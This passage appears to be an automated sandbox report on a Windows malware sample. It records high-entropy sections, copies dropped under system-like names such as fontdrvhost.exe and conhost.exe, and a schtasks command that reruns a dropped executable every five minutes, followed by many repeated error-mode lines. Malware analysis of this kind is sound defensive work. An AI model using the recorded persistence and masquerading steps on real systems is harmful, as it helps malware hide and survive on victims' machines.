                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 25_2_00007FFD345653D6 push cs; ret 25_2_00007FFD345653D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34571DD4 push eax; iretd 30_2_00007FFD34571DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34577E87 pushad ; retf 30_2_00007FFD34577EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD345600BD pushad ; iretd 30_2_00007FFD345600C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD345653D6 push cs; ret 30_2_00007FFD345653D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD3459C470 push A735F181h; iretd 30_2_00007FFD3459C476
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345700BD pushad ; iretd 31_2_00007FFD345700C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345753D6 push cs; ret 31_2_00007FFD345753D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34581DD4 push eax; iretd 31_2_00007FFD34581DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34587E87 pushad ; retf 31_2_00007FFD34587EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345AC470 push A735F181h; iretd 31_2_00007FFD345AC476
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34581DD4 push eax; iretd 40_2_00007FFD34581DD5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34587E87 pushad ; retf 40_2_00007FFD34587EBD
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345700BD pushad ; iretd 40_2_00007FFD345700C1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345753D6 push cs; ret 40_2_00007FFD345753D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345AC470 push A735F181h; iretd 40_2_00007FFD345AC476
                                    Source: fontdrvhost.exe.0.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: backgroundTaskHost.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe0.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: conhost.exe.5.drStatic PE information: section name: .text entropy: 7.56712127893692
                                    Source: AdbXCBUViTnoVBSsOq.exe1.5.drStatic PE information: section name: .text entropy: 7.56712127893692

                                    Persistence and Installation Behavior

                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeFile written: C:\Program Files\Internet Explorer\en-US\conhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files\Internet Explorer\en-US\conhost.exe
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\PjHeJXVW.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\OwXMDaSq.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\beESemrN.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exe
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\lNXiOOwv.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\UXZdmUkL.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\SvkCuJlg.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rfCzNWvT.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\LtQnCbUd.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\BoUXaXGR.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\crKSmbgv.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\uNJXqjUH.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile created: C:\Drivers\fontdrvhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\rFAHquBj.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\JRcNKQWy.log
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile created: C:\Users\user\Desktop\rWShinUN.log
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\backgroundTaskHost.exe

                                    Boot Survival

                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\backgroundTaskHost.exe
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
